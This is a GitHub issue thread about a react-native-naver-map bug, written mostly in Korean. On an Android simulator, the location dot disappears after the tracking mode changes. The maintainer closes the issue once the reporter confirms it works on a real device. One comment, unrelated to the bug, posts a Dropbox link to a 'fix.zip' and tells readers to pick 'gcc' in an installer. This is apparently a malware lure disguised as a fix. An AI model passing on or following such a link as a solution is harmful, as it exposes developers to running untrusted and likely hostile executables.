### ISSUE TITLE
[BUG]: LocationTrackingMode "NoFollow" mode

### ISSUE THREAD

**Issue by k2ker** [mym0404/react-native-naver-map#99]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Version of @mj-studio/react-native-naver-map

2.1.1

### Version of react-native

0.74.5

### What os are you seeing the problem on?

Android

### What device types are you seeing the problem on?

Simulator

### What architecture types of react native are you seeing the problem on?

New Architecture(Fabric)

### Version of device(android API, iOS OS version, etc...)

34

### Expo App

- [ ] I am using Expo

### What happened?

초기 init후 LocationTrackingMode NoFollow 옵션 지정하면 파란색 내위치 닷 표시됨.

그 이후 TrackingMode 변경하면 파란색 내위치 닷 사라짐
(Follow, Face모드로 변경하는 순간 내위치 닷 사라짐, 희미하게 푸르스름한 범위 배경만 남아있음)

![image](https://github.com/user-attachments/assets/af02dbc7-e378-4326-81aa-1f6ba48ffc85)

Doc 뒤져봐도 다른 옵션이 보이지 않아서 문의 남깁니다.

감사합니다~!

### Relevant a package.json.

```json
{
  "name": "GoldenMapTest",
  "version": "0.0.1",
  "private": true,
  "scripts": {
    "start-reset": "react-native start --reset-cache",
    "android": "react-native run-android",
    "android-list": "npx react-native run-android --list-devices",
    "ios": "react-native run-ios",
    "lint": "eslint .",
    "start": "react-native start",
    "test": "jest",
    "devtool": "npx react-devtools"
  },
  "dependencies": {
    "@gorhom/bottom-sheet": "^4.6.4",
    "@mj-studio/react-native-naver-map": "^2.1.1",
    "@react-navigation/native": "^6.1.18",
    "@react-navigation/native-stack": "^6.11.0",
    "axios": "^1.7.5",
    "babel-plugin-module-resolver": "^5.0.2",
    "expo": "^51.0.0",
    "expo-font": "^12.0.9",
    "expo-location": "~17.0.1",
    "react": "18.2.0",
    "react-native": "0.74.5",
    "react-native-gesture-handler": "^2.18.1",
    "react-native-reanimated": "^3.15.0",
    "react-native-safe-area-context": "^4.10.9",
    "react-native-screens": "^3.32.0",
    "react-native-svg": "^15.6.0",
    "react-native-svg-transformer": "^1.5.0"
  },
  "devDependencies": {
    "@babel/core": "^7.20.0",
    "@babel/preset-env": "^7.20.0",
    "@babel/runtime": "^7.20.0",
    "@react-native/babel-preset": "0.74.87",
    "@react-native/eslint-config": "0.74.87",
    "@react-native/metro-config": "0.74.87",
    "@react-native/typescript-config": "0.74.87",
    "@types/react": "^18.2.6",
    "@types/react-test-renderer": "^18.0.0",
    "babel-jest": "^29.6.3",
    "eslint": "^8.19.0",
    "jest": "^29.6.3",
    "prettier": "2.8.8",
    "react-test-renderer": "18.2.0",
    "typescript": "5.0.4"
  },
  "engines": {
    "node": ">=18"
  }
}
```

### Reproducible Sample Repository

테스트빌드입니다

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mym0404** [comment]
실제 기기에서도 그런지 확인부탁드립니다.

**Comment by k2ker** [comment]
실제 기기는 정상작동 합니다~!

**Comment by mym0404** [comment]
네 이슈 닫도록 하겠습니다. 테스트 감사합니다.
